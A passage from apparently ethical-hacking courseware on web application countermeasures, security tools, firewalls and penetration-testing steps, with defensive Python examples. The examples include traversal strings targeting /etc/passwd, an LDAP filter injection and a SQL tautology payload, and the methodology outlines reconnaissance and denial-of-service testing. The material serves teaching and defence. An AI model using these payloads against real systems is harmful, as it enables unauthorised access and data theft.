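    for message in (GOOD_REQUEST, XXE_REQUEST, BAD_SCHEMA_REQUEST):
        print(validate_soap_request(message))
```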



Web Application Countermeasures


The following are the various countermeasures that can be adopted for web applications.

Unvalidated Redirects and Forwards

- Avoid using redirects and forwards. If destination parameters cannot be avoided, ensure that the supplied value is valid, and authorized for the user.

Cross-Site Request Forgery

- Log off immediately after using a web application and clear the history.
- Do not allow your browser and websites to save login details.
- Check the HTTP Referer header and, when processing a POST, ignore URL parameters.

Broken Authentication and Session Management

- Use SSL for all authenticated parts of the application.
- Verify whether all the users' identities and credentials are stored in a hashed form.
- Never submit session data as part of a GET or POST.


Insecure Cryptographic Storage

- Do not create or use weak cryptographic algorithms.
- Generate encryption keys offline and store them securely.
- Ensure that encrypted data stored on disk is not easy to decrypt.
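An added Python example (not the module's code) of the redirect and CSRF countermeasures above: the redirect destination is looked up from a fixed table and checked for the user's authorization, and a POST is accepted only with a same-site Referer and a token taken from the form body, never from URL parameters. The host name, redirect table and sample requests are constructed.

```python
"""Validated redirects and a Referer-based CSRF check.

Added example, not the module's code. Host, redirect table and sample
requests are constructed.
"""
import hmac
from typing import Dict, Optional, Set, Tuple
from urllib.parse import urljoin, urlsplit

SITE_HOST = "shop.example.com"              # constructed application host
ALLOWED_REDIRECT_HOSTS = {SITE_HOST, "help.example.com"}

# Destinations are chosen from a fixed table keyed by a short token, each
# with the role a user needs to be sent there; the client never supplies a URL.
REDIRECT_TABLE: Dict[str, Tuple[str, Optional[str]]] = {
    "home": ("/", None),
    "orders": ("/account/orders", "customer"),
    "help": ("https://help.example.com/start", None),
}


def resolve_redirect(token: Optional[str], user_roles: Set[str]) -> str:
    """Map a client-supplied token to a destination, or fall back to '/'.

    The destination is looked up rather than built from the parameter, the
    user must hold the role it requires, and the result is re-checked
    against the allowed hosts so that a table edit cannot open a redirect.
    """
    entry = REDIRECT_TABLE.get(token or "")
    if entry is None:
        return "/"
    target, required_role = entry
    if required_role is not None and required_role not in user_roles:
        return "/"                           # valid target, not authorized for this user
    parts = urlsplit(urljoin(f"https://{SITE_HOST}/", target))
    if parts.scheme != "https" or parts.hostname not in ALLOWED_REDIRECT_HOSTS:
        return "/"
    return target


def csrf_check(request: Dict) -> bool:
    """Accept a state-changing request only when it was made by this site.

    The Referer must name our host, and the token is read from the POST
    body only: URL parameters are ignored when processing a POST, so a
    token placed in the query string of a crafted link does not count.
    """
    if request["method"] != "POST":
        return False
    referer = request["headers"].get("Referer", "")
    if urlsplit(referer).hostname != SITE_HOST:
        return False
    expected = request["session"].get("csrf_token")
    supplied = request["form"].get("csrf_token")    # request["query"] deliberately unused
    if not expected or not supplied:
        return False
    return hmac.compare_digest(supplied, expected)


# Constructed sample requests (not captured traffic).
LEGIT_POST = {
    "method": "POST",
    "headers": {"Referer": "https://shop.example.com/account/settings"},
    "query": {},
    "form": {"csrf_token": "constructed-token-1", "email": "alice@example.com"},
    "session": {"csrf_token": "constructed-token-1"},
}
FORGED_POST = {
    "method": "POST",
    "headers": {"Referer": "https://other.example/page"},
    "query": {"csrf_token": "constructed-token-1"},   # token only in the URL
    "form": {"email": "changed@example.com"},
    "session": {"csrf_token": "constructed-token-1"},
}

if __name__ == "__main__":
    print(resolve_redirect("orders", {"customer"}))   # /account/orders
    print(resolve_redirect("//other.example/", {"customer"}))   # /
    print(csrf_check(LEGIT_POST), csrf_check(FORGED_POST))   # True False
```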



Web Application Countermeasures (Contd)


The following are the various countermeasures that can be adopted for web applications.

Insufficient Transport Layer Protection

- Non-SSL requests to web pages should be redirected to the SSL page.
- Set the 'secure' flag on all sensitive cookies.
- Configure the SSL provider to support only strong algorithms.
- Ensure the certificate is valid, not expired, and matches all domains used by the site.
- Backend and other connections should also use SSL or other encryption technologies.

Directory Traversal

- Define access rights to the protected areas of the website.
- Apply checks/hot fixes that prevent the exploitation of the vulnerability, such as Unicode, to affect the directory traversal.
- Web servers should be updated with security patches in a timely manner.


Cookie/Session Poisoning

- Do not store a plain text or weakly encrypted password in a cookie.
- Implement a cookie timeout.
- A cookie's authentication credentials should be associated with an IP address.
- Make logout functions available.
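An added Python example (not the module's code) of the directory traversal and cookie countermeasures above: a requested file name is percent-decoded and Unicode-normalized, then checked by canonical path against the document root, and the session cookie is issued with the Secure flag, HttpOnly and a timeout. The document root and the session value are constructed.

```python
"""Safe file resolution against directory traversal, plus a hardened cookie.

Added example, not the module's code. Document root and session value
are constructed.
"""
import os
import unicodedata
from http.cookies import SimpleCookie
from typing import Optional
from urllib.parse import unquote

DOC_ROOT = os.path.abspath("/srv/www/public")    # constructed document root


def resolve_public_file(requested: str) -> Optional[str]:
    """Return the absolute path of a file under DOC_ROOT, or None.

    Percent-encoding (including double encoding) is unwound and Unicode
    look-alikes of '.' and '/' are normalized before the check, and the
    decision is made on the canonical absolute path rather than by looking
    for "..", so encoded variants of the traversal do not slip past it.
    """
    decoded = requested
    for _ in range(4):                       # stop once no encoding layer remains
        nxt = unquote(unicodedata.normalize("NFKC", decoded))
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        return None                          # embedded NUL: refuse outright
    candidate = os.path.abspath(os.path.join(DOC_ROOT, decoded.lstrip("/\\")))
    if candidate == DOC_ROOT or os.path.commonpath([DOC_ROOT, candidate]) != DOC_ROOT:
        return None
    return candidate


def session_cookie(session_id: str, max_age: int = 900) -> str:
    """Build the Set-Cookie value for the session identifier.

    Secure keeps the cookie off non-SSL requests, HttpOnly keeps script
    away from it, and Max-Age implements the cookie timeout.
    """
    jar = SimpleCookie()
    jar["SESSIONID"] = session_id
    jar["SESSIONID"]["secure"] = True
    jar["SESSIONID"]["httponly"] = True
    jar["SESSIONID"]["max-age"] = max_age
    jar["SESSIONID"]["path"] = "/"
    jar["SESSIONID"]["samesite"] = "Strict"
    return jar.output(header="").strip()


if __name__ == "__main__":
    for name in ("css/site.css", "../../etc/passwd",
                 "%252e%252e/%252e%252e/etc/passwd", "\uff0e\uff0e/\uff0e\uff0e/etc/passwd"):
        print(repr(name), "->", resolve_public_file(name))
    print(session_cookie("constructed-session-value"))
```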



Web Application Countermeasures (Contd)


The following are the various countermeasures that can be adopted for web applications.

Security Misconfiguration

- Configure all security mechanisms and turn off all unused services.
- Set up roles, permissions, and accounts and disable all default accounts or change their default passwords.
- Scan for the latest security vulnerabilities and apply the latest security patches.

LDAP Injection Attacks

- Perform type, pattern, and domain value validation on all input data.
- Make LDAP filters as specific as possible.
- Validate and restrict the amount of data returned to the user.
- Implement tight access control on the data in the LDAP directory.
- Perform dynamic testing and source code analysis.
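An added Python example (not the module's code) of the LDAP countermeasures above: input is pattern-validated, the assertion value is escaped per RFC 4515, and the filter is kept to one object class and one attribute. A toy filter evaluator stands in for the directory server so the difference between a concatenated and an escaped filter can be observed; the directory entries are constructed.

```python
"""LDAP search filters built from user input with RFC 4515 escaping.

Added example, not the module's code. Directory entries are constructed
and the evaluator is a toy stand-in for a real server.
"""
import re
from typing import Dict, List

# Constructed directory contents; stands in for the LDAP server.
DIRECTORY: List[Dict[str, str]] = [
    {"objectClass": "person", "uid": "alice", "cn": "Alice Adams", "mail": "alice@example.com"},
    {"objectClass": "person", "uid": "bob", "cn": "Bob Brown", "mail": "bob@example.com"},
    {"objectClass": "device", "uid": "printer1", "cn": "Lobby printer"},
]

# RFC 4515: these characters must be escaped inside an assertion value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value so the server matches it literally."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def username_allowed(username: str) -> bool:
    """Pattern and domain validation before the value goes near a filter."""
    return re.fullmatch(r"[A-Za-z0-9._-]{1,64}", username) is not None


def login_filter_unsafe(username: str) -> str:
    """The pattern to avoid: the filter is assembled by concatenation."""
    return f"(&(objectClass=person)(uid={username}))"


def login_filter(username: str) -> str:
    """Specific, escaped filter: one object class, one attribute, exact match."""
    if not username_allowed(username):
        raise ValueError("username rejected by input validation")
    return f"(&(objectClass=person)(uid={escape_filter_value(username)}))"


def _value_regex(pattern: str) -> str:
    """Translate an assertion value: '*' is a wildcard, \\XX is a literal byte."""
    out, i = [], 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and re.fullmatch(r"[0-9A-Fa-f]{2}", pattern[i + 1:i + 3]):
            out.append(re.escape(chr(int(pattern[i + 1:i + 3], 16))))
            i += 3
        elif ch == "*":
            out.append(".*")
            i += 1
        else:
            out.append(re.escape(ch))
            i += 1
    return "".join(out)


def evaluate_filter(ldap_filter: str, entries: List[Dict[str, str]]) -> List[str]:
    """Toy evaluator for AND filters of equality/substring clauses.

    It reads the filter the way a directory server does: every '(attr=value)'
    clause inside the outer '(&...)' must match, so clauses that arrive
    through an unescaped value become part of the search.
    """
    clauses = re.findall(r"\(([^()]+)\)", ldap_filter)
    matched = []
    for entry in entries:
        if all(re.fullmatch(_value_regex(pat), entry.get(attr, "")) is not None
               for attr, _, pat in (c.partition("=") for c in clauses)):
            matched.append(entry["uid"])
    return matched


if __name__ == "__main__":
    print(evaluate_filter(login_filter("alice"), DIRECTORY))              # ['alice']
    print(evaluate_filter(login_filter_unsafe("*)(mail=*"), DIRECTORY))    # every person
    escaped = escape_filter_value("*)(mail=*")
    print(evaluate_filter(f"(&(objectClass=person)(uid={escaped}))", DIRECTORY))  # []
```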


File Injection Attack

- Strongly validate user input.
- Consider implementing a chroot jail.
- PHP: Disable allow_url_fopen and allow_url_include in php.ini.
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
- PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.



How to Defend Against Web Application Attacks


To defend against web application attacks, you can follow the countermeasures stated previously. To protect the web server, you can use a WAF firewall/IDS and filter packets. You need to constantly update the software using patches to keep the server up-to-date and to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize use of third-party applications to protect the web applications. You can also use stored procedures and parameter queries to retrieve data, disable verbose error messages, which can guide the attacker with some useful information, and use custom error pages to protect the web applications. To avoid SQL injection into the database, connect using a non-privileged account and grant least privileges to the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
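An added Python example (not the module's code) of parameter queries, least privilege and custom error pages, with an in-memory SQLite database standing in for the production server: the concatenated query is shown beside the parameterized one, SQLite's authorizer callback stands in for the privileges a non-privileged database account would have, and database errors are turned into a generic page with the details kept in the server log. The schema and rows are constructed.

```python
"""Parameter queries, least privilege and custom error pages on SQLite.

Added example, not the module's code. Schema and rows are constructed;
the SQLite authorizer stands in for database account privileges.
"""
import html
import logging
import sqlite3
import uuid
from typing import List, Tuple

log = logging.getLogger("webapp")


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory database with one login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "hash-of-alice-pw", "customer"),
        ("admin", "hash-of-admin-pw", "admin"),
    ])
    return conn


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> List[tuple]:
    """The pattern to avoid: SQL text assembled from user input."""
    return conn.execute(
        f"SELECT username, role FROM users WHERE username = '{username}'"
    ).fetchall()


def find_user(conn: sqlite3.Connection, username: str) -> List[tuple]:
    """Parameter query: the value travels separately from the SQL text and
    is only ever compared as data, whatever characters it contains."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def restrict_to_read_only(conn: sqlite3.Connection) -> None:
    """Least privilege for the web tier: SELECT on users.username/role only.

    SQLite has no accounts or GRANTs, so the authorizer callback stands in
    for the non-privileged account: writes, schema changes and reads of
    pw_hash are refused by the database layer itself.
    """
    readable = {"username", "role"}

    def authorizer(action, arg1, arg2, db_name, trigger_or_view):
        if action == sqlite3.SQLITE_SELECT:
            return sqlite3.SQLITE_OK
        if action == sqlite3.SQLITE_READ and arg1 == "users" and arg2 in readable:
            return sqlite3.SQLITE_OK
        return sqlite3.SQLITE_DENY

    conn.set_authorizer(authorizer)


def statement_permitted(conn: sqlite3.Connection, sql: str) -> bool:
    """Report whether the database lets this connection run the statement."""
    try:
        conn.execute(sql)
        return True
    except sqlite3.DatabaseError:
        return False


def handle_lookup(conn: sqlite3.Connection, username: str) -> Tuple[int, str]:
    """Produce the HTTP status and page body for a user lookup.

    Database errors become a generic custom page with an opaque reference;
    driver messages, SQL and table names go to the server log only.
    """
    try:
        rows = find_user(conn, username)
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("lookup failed ref=%s user=%r: %s", ref, username, exc)
        return 500, f"<h1>Something went wrong</h1><p>Reference: {ref}</p>"
    if not rows:
        return 404, "<h1>Not found</h1>"
    name, role = rows[0]
    return 200, f"<p>{html.escape(name)} ({html.escape(role)})</p>"


if __name__ == "__main__":
    db = build_demo_db()
    print(find_user(db, "alice"))                          # [('alice', 'customer')]
    print(len(find_user_unsafe(db, "x' OR '1'='1")))       # 2: the whole table
    restrict_to_read_only(db)
    print(statement_permitted(db, "UPDATE users SET role = 'admin'"))   # False
    print(handle_lookup(db, "nobody"))
```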


FIGURE 13.61: How to Defend Against Web Application Attacks

[Figure: diagram of an attacker reaching a login form over the Internet, the web application, the operating system, the LDAP server and a custom error page, labelled with the countermeasures: perform input validation; configure the firewall to deny external ICMP traffic access; shut down the unnecessary services and ports; use WAF firewall/IDS and filter packets; keep patches current; connect to the database using a non-privileged account; use stored procedures and parameter queries; grant least privileges to the database, tables, and columns; analyze the source code for SQL injection; minimize use of 3rd party apps; sanitize and filter user input; disable commands like xp_cmdshell; perform dynamic testing and source code analysis; make LDAP filter as specific as possible; disable verbose error messages and use custom error pages.]


Module Flow

Now we will discuss web application security tools. Web application security tools help you to detect the possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked. Tools in addition to the countermeasures offer more protection.

[Module flow diagram: Web App Concepts; Web App Threats; Hacking Methodology; Web Application Hacking Tools; Countermeasures; Security Tools; Web App Pen Testing.]

This section is dedicated to the security tools that protect web applications against various attacks.



Web Application Security Tool: Acunetix Web Vulnerability Scanner


Source: http://www.acunetix.com

Acunetix Web Vulnerability Scanner automatically checks your web applications for SQL injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It even tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications.


FIGURE 13.62: Acunetix Web Vulnerability Scanner Tool Screenshot



Web Application Security Tool: Watcher Web Security Tool

Source: http://www.casaba.com

Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. Passive detection means it's safe for production use. It detects web-application security issues and operational configuration issues.


FIGURE 13.63: Watcher Web Security Tool Screenshot


Web Application Security Scanner: Netsparker


Netsparker performs automated comprehensive web application scanning for vulnerabilities such as SQL injection, cross-site scripting, remote code injection, etc. It delivers detection, confirmation, and exploitation of vulnerabilities in a single integrated environment.

http://www.mavitunasecurity.com



Web A pplication Security Scanner: Netsparker


Source: http://www.mavitunasecurity.com

Netsparker can find and report on security vulnerabilities such as SQL injection and cross-site scripting (XSS) in all web applications, regardless of the platform and the technology they are built on. It allows you to resolve security problems before they're actually misused and compromised by unknown attackers.



FIGURE 13.64: Netsparker Tool Screenshot


Web Application Security Tool: N-Stalker Web Application Security Scanner

N-Stalker Web Application Security Scanner is an effective suite of web security assessment checks to enhance the overall security of web applications against a wide range of vulnerabilities and sophisticated hacker attacks.

It contains all web security assessment checks such as:
Code injection
Cross-site scripting
Parameter tampering
Web server vulnerabilities

http://nstalker.com


Web Application Security Tool: N-Stalker Web Application Security Scanner

Source: http://nstalker.com

N-Stalker Web Application Security Scanner provides an effective suite of web security assessment checks to enhance the overall security of your web applications against a wide range of vulnerabilities and sophisticated hacker attacks. It also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application's SDLC, including the ability to control information exposure, development flaws, infrastructure issues, and real security vulnerabilities that can be explored by external agents. It contains all web security assessment checks such as code injection, cross-site scripting, parameter tampering, web server vulnerabilities, etc.




FIGURE 13.65: N-Stalker Web Application Security Scanner Tool Screenshot


Web Application Security Tool: VampireScan

VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal.

Features:
Protect your website from hackers
Scan and protect your infrastructure and web applications from cyberthreats
Give you direct, actionable insight on high, medium, and low risk vulnerabilities

http://www.vampiretech.com


Web Application Security Tool: NStalker Web Application Security Scanner

Source: http://www.vampiretech.com

VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal. It can protect your website from hackers. This tool can scan and protect your infrastructure and web applications from cyber-threats and can also give you direct, actionable insight on high, medium, and low risk vulnerabilities.



FIGURE 13.66: N-Stalker Web Application Security Scanner Tool Screenshot


Web Application Security Tools

SandcatMini
http://www.syhunt.com

Websecurify
http://www.websecurify.com

OWASP ZAP
http://www.owasp.org

NetBrute
http://www.rawlogic.com

skipfish
http://code.google.com

X5s
http://www.casaba.com

SecuBat Vulnerability Scanner
http://secubat.codeplex.com

WSSA - Web Site Security Scanning Service
https://secure.beyondsecurity.com

SPIKE Proxy
http://www.immunitysec.com

Ratproxy
http://code.google.com


Web Application Security Tools

Web application security tools are web application security assessment software designed to thoroughly analyze today's complex web applications with the aim of finding exploitable SQL injection, XSS vulnerabilities, etc. These tools deliver scanning capabilities, broad assessment coverage, and accurate web application scanning results. Commonly used web application security tools are listed as follows:

SandcatMini available at http://www.syhunt.com
OWASP ZAP available at http://www.owasp.org
skipfish available at http://code.google.com
SecuBat Vulnerability Scanner available at http://secubat.codeplex.com
SPIKE Proxy available at http://www.immunitysec.com
Websecurify available at http://www.websecurify.com
NetBrute available at http://www.rawlogic.com
X5s available at http://www.casaba.com
WSSA Web Site Security Scanning Service available at https://secure.beyondsecurity.com


Ratproxy available at http://code.google.com


Web Application Security Tools (Contd)

Wapiti
http://wapiti.sourceforge.net

Syhunt Hybrid
http://www.syhunt.com

WebWatchBot
http://www.exclamationsoft.com

Exploit-Me
http://labs.securitycompass.com

KeepNI
http://www.keepni.com

WSDigger
http://www.mcafee.com

Grabber
http://rgaucher.info

Arachni
http://arachni-scanner.com

xsss
http://www.sven.de

Vega
http://www.subgraph.com


Web Application Security Tools (Contd)

In addition to the previously mentioned web application security tools, there are a few more tools that can be used to assess the security of web applications:

Wapiti available at http://wapiti.sourceforge.net
WebWatchBot available at http://www.exclamationsoft.com
KeepNI available at http://www.keepni.com
Grabber available at http://rgaucher.info
XSSS available at http://www.sven.de
Syhunt Hybrid available at http://www.syhunt.com
Exploit-Me available at http://labs.securitycompass.com
WSDigger available at http://www.mcafee.com
Arachni available at http://arachni-scanner.com
Vega available at http://www.subgraph.com


Web A pplication Firewall: dotDefender


dotDefender is a software based Web Application Firewall
It complements the network firewall, IPS and other network-based Internet security products
It inspects the HTTP/HTTPS traffic for suspicious behavior
It detects and blocks SQL injection attacks

http://www.applicure.com


Web Application Firewall: dotDefender

Source: http://www.applicure.com

dotDefender is a software-based web application firewall that provides additional website security against malicious attacks and website defacement. It protects your website from malicious attacks. Web application attacks such as SQL injection, path traversal, cross-site scripting, and other attacks leading to website defacement can be prevented with dotDefender. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.



FIGURE 13.67: dotDefender


Web A pplication Firewall: ServerDefender VP


ServerDefender VP Web application firewall is designed to provide security against web attacks.

http://www.port80software.com


Web A pplication Firewall: ServerDefender VP

Source: http://www.port80software.com

The ServerDefender VP web application firewall is designed to provide security against web attacks. SDVP security will prevent data theft and breaches and stop unauthorized site defacement, file alterations, and deletions.



FIGURE 13.68: ServerDefender VP


Radware's AppWall
http://www.radware.com

Barracuda Web Application Firewall
https://www.barracudanetworks.com

ThreatSentry
http://www.privacyware.com

Stingray Application Firewall
http://www.riverbed.com

QualysGuard WAF
http://www.qualys.com

IBM Security AppScan
http://www-01.ibm.com

ThreatRadar
http://www.imperva.com

Trustwave WebDefend
https://www.trustwave.com

ModSecurity
http://www.modsecurity.org

Cyberoam's Web Application Firewall
http://www.cyberoam.com


Web Application Firewalls

Web application firewalls secure websites, web applications, and web services against known and unknown attacks. They prevent data theft and manipulation of sensitive corporate and customer information. Commonly used web application firewalls are listed as follows:

Radware's AppWall available at http://www.radware.com
ThreatSentry available at http://www.privacyware.com
QualysGuard WAF available at http://www.qualys.com
ThreatRadar available at http://www.imperva.com
ModSecurity available at http://www.modsecurity.org
Barracuda Web Application Firewall available at https://www.barracudanetworks.com
Stingray Application Firewall available at http://www.riverbed.com
IBM Security AppScan available at http://www-01.ibm.com
Trustwave WebDefend available at https://www.trustwave.com
Cyberoam's Web Application Firewall available at http://www.cyberoam.com


Module Flow

As mentioned previously, web applications are more vulnerable to attacks. Attackers use web applications as the sources for spreading attacks by turning them into malicious applications once compromised. Your web application may also become a victim of such attacks. Therefore, to avoid this situation, you should conduct penetration testing in order to determine the vulnerabilities before they are exploited by real attackers.

Web App Pen Testing
Web App Concepts
Security Tools
Web App Threats
Countermeasures
Hacking Methodology
Web Application Hacking Tools


Web applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.


Web Application Pen Testing


Web application pen testing is used to identify, analyze, and report vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. in a given application.

The best way to perform penetration testing is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities.

Identification of Ports: Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses

Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the issue

Remediation of Vulnerabilities: To retest the solution against vulnerability to ensure that it is completely secure


Web Application Pen Testing

Web application pen testing is done to detect various security vulnerabilities and associated risks. As a pen tester, you should test your web application for vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. The best way to carry out a penetration test is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities.

Web application pen testing helps in:

Identification of Ports: Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses.

Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the issue.

Remediation of Vulnerabilities: To retest the solution against vulnerability to ensure that it is completely secure.


Web Application Pen Testing (Contd)

START
Information Gathering
Configuration Management Testing
Authentication Testing
Session Management Testing
Authorization Testing
Web Services Testing
Business Logic Testing
Data Validation Testing
AJAX Testing
Denial-of-Service Testing


Web Application Pen Testing (Contd)

The general steps that you need to follow to conduct a web application penetration test are listed as follows. In a later section, each step is explained in detail.

Step 1: Defining objective


You should define the aim of the penetration test before conducting it. This helps you move in the right direction towards the aim of your penetration test.

Step 2: Information gathering


You should gather as much information as possible about your target system or network.

Step 3: Configuration management testing


Most web application attacks occur because of improper configuration. Therefore, you should conduct configuration management testing. This also helps you to protect against known vulnerabilities by installing the latest updates.

Step 4: Authentication testing session


Test the authentication session to understand the authentication mechanism and to determine the possible exploits in it.


Step 5: Session management testing


Perform session management testing to check your web application against various attacks that are based on session ID such as session hijacking, session fixation, etc.

Step 6: Denial-of-service testing


Send a vast number of requests to the web application until the server becomes saturated, then analyze the behavior of the application while the server is saturated. In this way you can test your web application against denial-of-service attacks.

Step 7: Data validation testing


Failing to adopt a proper data validation method is a common security weakness observed in most web applications, and it may further lead to major vulnerabilities. Hence, before a hacker finds those vulnerabilities and exploits your application, perform data validation testing and protect your web application.

Step 8: Business logic testing


Web application security flaws may be present even in the business logic. Hence, you should test the business logic for flaws. By exploiting the business logic, attackers may do something that is not allowed by the business, which may sometimes lead to great financial loss. Testing business logic for security flaws requires unconventional thinking.

Step 9: Authorization testing


Analyze how a web application is authorizing the user and then try to find and exploit the vulnerabilities present in the authorization mechanism.

Step 10: Web services testing


Web services use the HTTP protocol in conjunction with XML, WSDL, SOAP, and UDDI technologies. Therefore, web services have XML/parser-related vulnerabilities in addition to SQL injection, information disclosure, etc. You should conduct web services testing to determine the vulnerabilities of web-based services.

Step 11: AJAX testing


Though more responsive web applications are developed using AJAX, they are likely as vulnerable as traditional web applications. Testing AJAX is challenging because web application developers have full freedom to design the way of communication between client and server.

Step 12: Document all the findings


Once you conduct all the tests mentioned here, document all the findings and the testing techniques employed at each step. Analyze the document and explain the current security posture to the concerned parties and suggest how they can enhance their security.


[Slide: Information Gathering. Flowchart of steps 1 to 5 and the information each yields: allowed and disallowed directories; issues of web application structure and error pages produced; cookie information, 300 and 400 HTTP status codes and 500 internal server errors; web applications and old versions of files or artifacts; web server software version, scripting environment and OS in use.]

Information Gathering
Let's get into detail and discuss each web application test step thoroughly. The first step in web application pen testing is information gathering. To gather all the information about the target application, follow these steps:

Step 1: Analyze the robots.txt file


robots.txt is a file that instructs web robots about the website, such as which directories they are allowed or disallowed to visit. Hence, analyze the robots.txt file and determine the allowed and disallowed directories of a web application. You can retrieve and analyze the robots.txt file using tools such as GNU Wget.
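As an added example (not courseware code), the parser below turns a retrieved robots.txt into per-agent Allow/Disallow lists so the disallowed directories can be reviewed in one place. The sample file is constructed for the example; the host name example.invalid is a placeholder.

```python
"""Parse robots.txt into per-agent Allow/Disallow lists (added example)."""
from __future__ import annotations

from dataclasses import dataclass, field

# Constructed sample robots.txt (made up for this example, not from a real site).
SAMPLE_ROBOTS_TXT = """\
# crawler policy
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /cgi-bin/
Allow: /public/
Sitemap: https://example.invalid/sitemap.xml

User-agent: Googlebot
Disallow: /private/
"""


@dataclass
class RobotsRules:
    """Allow/Disallow paths keyed by the User-agent group they belong to."""
    disallow: dict[str, list[str]] = field(default_factory=dict)
    allow: dict[str, list[str]] = field(default_factory=dict)
    sitemaps: list[str] = field(default_factory=list)


def parse_robots(text: str) -> RobotsRules:
    """Parse robots.txt text.

    A group is one or more consecutive User-agent lines followed by its
    directives; a User-agent line that follows a directive starts a new group.
    """
    rules = RobotsRules()
    agents: list[str] = []
    previous_was_agent = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and whitespace
        if ":" not in line:
            continue  # blank line or junk
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            if not previous_was_agent:
                agents = []  # a new group begins
            agents.append(value)
            previous_was_agent = True
            continue
        previous_was_agent = False
        if key == "sitemap":
            rules.sitemaps.append(value)
        elif key in ("allow", "disallow") and agents and value:
            table = rules.allow if key == "allow" else rules.disallow
            for agent in agents:
                table.setdefault(agent, []).append(value)
    return rules


def disallowed_paths(rules: RobotsRules) -> list[str]:
    """Every Disallow path across all agents: the list a tester reviews first,
    because it advertises the directories the site owner wants unvisited."""
    return sorted({path for paths in rules.disallow.values() for path in paths})


if __name__ == "__main__":
    parsed = parse_robots(SAMPLE_ROBOTS_TXT)
    for path in disallowed_paths(parsed):
        print("disallowed:", path)
```

robots.txt is advice to crawlers, not access control: each path it lists under Disallow must still be protected server-side, and the defender's follow-up check is that requesting those paths without credentials is refused.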

Step 2: Perform search engine reconnaissance


Use the advanced "site:" search operator and then click Cached to perform search engine reconnaissance. It gives you information such as issues of web application structure and error pages produced.


Step 3: Identify application entry points


Identify application entry points using tools such as Webscarab, Burp Proxy, OWASP ZAP, TamperIE (for Internet Explorer), or Tamper Data (for Firefox). Cookie information, 300 and 400 HTTP status codes, and 500 internal server errors may give clues about the entry points of the target web application.

Step 4: Identify the web applications


To identify web applications: probe for URLs, do dictionary-style searching (intelligent guessing), and perform vulnerability scanning using tools such as Nmap (Port Scanner) and Nessus. Check for web applications, old versions of files, or artifacts. Sometimes the old versions of files may give useful information that attackers can use to launch attacks on the web application.

Step 5: Analyze the output from HEAD and OPTIONS HTTP requests


Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, and querying search engines (Googling). This may reveal information such as the web server software version, scripting environment, and OS in use.


[Slide: Information Gathering (Contd). Flowchart of steps 6 to 9 and the information each yields: analysis of error codes (software versions, details of databases, bugs, and technological components); test for recognized file types/extensions/directories (web application environment); examine source of available pages (clues as to the underlying application environment); TCP/ICMP and service fingerprinting (web application services and associated ports).]

Information Gathering (Contd)


Step 6: Analyze error codes
Analyze error codes by requesting invalid pages and utilize alternate request methods (POST/PUT/Other) in order to collect confidential information from the server. This may reveal information such as software versions, details of databases, bugs, and technological components.

Step 7: Test for recognized file types/extensions/directories


Test for recognized file types/extensions/directories by requesting common file extensions such as .ASP, .HTM, .PHP, .EXE, and observe the response. This may give you an idea about the web application environment.

Step 8: Examine source of available pages


Examine the source code from the accessible pages of the application front-end. This provides clues about the underlying application environment.

Step 9: TCP/ICMP an d service fingerprinting


Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap. This gives you information about web application services and their associated ports.


[Slide: Configuration Management Testing. Flowchart of steps 1 to 7 and their outcomes: SSL/TLS testing (disclosure of confidential information); infrastructure configuration management testing (source code of the application); application configuration management testing (information in the source code, log files, and default error codes); file extensions handling (confidential information about access credentials); old, backup, and unreferenced files (source code, installation paths, passwords for applications and databases); infrastructure and application admin interfaces (access to admin functionality); HTTP methods and XST (credentials of legitimate users).]

Configuration Management Testing

Once you gather information about the web application environment, test the configuration management. It is important to test the configuration management because improper configuration may allow unauthorized users to break into the web application.

Step 1: Perform SSL/TLS testing


SSL/TLS testing allows you to identify the ports associated with SSL/TLS wrapped services. You can do this with the help of tools such as Nmap and Nessus. This test shows where confidential information may be disclosed.

Step 2: Perform infrastructure configuration management testing


Perform network scanning and analyze web server banners to analyze the source code of the application.

Step 3: Perform application configuration management testing


